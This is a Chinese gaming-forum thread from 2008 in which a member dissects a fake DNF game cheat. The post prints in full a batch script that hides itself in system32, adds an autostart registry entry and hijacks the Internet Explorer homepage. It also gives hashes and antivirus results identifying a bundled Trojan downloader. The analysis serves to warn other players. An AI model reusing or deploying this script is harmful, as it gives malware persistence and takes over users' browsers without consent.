关于刚才某位猴子所发的挂文件分析过程。顺便钦佩你一下!

社区服务
高级搜索
猴岛论坛DNF地下城与勇士关于刚才某位猴子所发的挂文件分析过程。顺便钦佩你一下!
发帖 回复
倒序阅读 最近浏览的帖子最近浏览的版块
2个回复

关于刚才某位猴子所发的挂文件分析过程。顺便钦佩你一下!

楼层直达
60750706

ZxID:1002955

等级: 下士
DNF-WG技术交流群:30450435
举报 只看楼主 使用道具 楼主   发表于: 2008-12-12 0
解压缩。打开后发现一个文件为
注册软件 - 重要.bat
然后右键点编辑。

@echo off
copy %0 %windir%\system32\home.bat /y
attrib %windir%\system32\home.bat +s +h +a +r
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v home /t REG_SZ /d %windir%\system32\home.bat /f
@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /f
@reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.computernic.cn/" /f
@reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\control Panel" /v "HomePage" /d "1" /f


发现运行上面的代码。。。
我就迷茫了。。
他干什么要把哪个地址设置为主页???
还有就是把那些东西写入 home.bat
从下面这句命令可以看出来。

attrib %windir%\system32\home.bat +s +h +a +r
把这个文件放到系统目录干什么?还要加上
+s设置为系统文件夹属性
+h隐藏属性
+a存档文件夹属性
+r只读属性
一个自己文件把自己搞的地址设置为主页不说。。还要设置为系统属性?并且隐藏?还只读?
他这个挂究竟是想干什么???。这不是挂。。
再看 Gamue_登录器 
这个文件更可疑了。。
杀毒软件查不出来。。不代表这个文件没问题。因为只有31KB。。。
我很怀疑。。这是下载器一类的病毒。当时运行没什么。。可是在后台自动下载程序并且运行。
所以应该当时查不出问题。。
愚弄人的么?
我把这个文件送到网页上检测。。什么地址请搜索我的帖子。。
结果。。有两款杀毒软件查出问题了。。
看下面的结果。。

文件信息
文件名称 :  Gamue_登录器.exe
文件大小 :  31744 byte
文件类型 :  PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5 :  0d9d36c85a9f04e56723cc9d4762590b
SHA1 :  e6cb9efb377aae355a170fcc367470a7d9e2a67f
扫描结果
时间 :  2008/12/12 01:24:16 (CST)
软件名称  扫描结果 时间
a-squared Trojan-Downloader.Win32.Agent.ccg!A2 4.452
ClamAV Trojan.Downloader-19191 0.011

到了这里。。。我看明白了。。
这是一种在windows系统下的特洛伊木马病毒,一般是PE病毒。
删除。。。心里问候一下发这个东西的家伙。
joezhang

ZxID:2410176

等级: 下士
举报 只看该作者 沙发   发表于: 2008-12-12 0
虽然看不懂~~
但楼主好强大~~
厉害~~
没G,
没G.
没G你让我怎么活啊
56533513

ZxID:1716638

等级: 上尉
习惯, 独 自 一 人 , 静静的
举报 只看该作者 板凳   发表于: 2008-12-12 0
这病毒怎么清楚啊?
我们用了的都种了吗?
« 返回列表
发帖 回复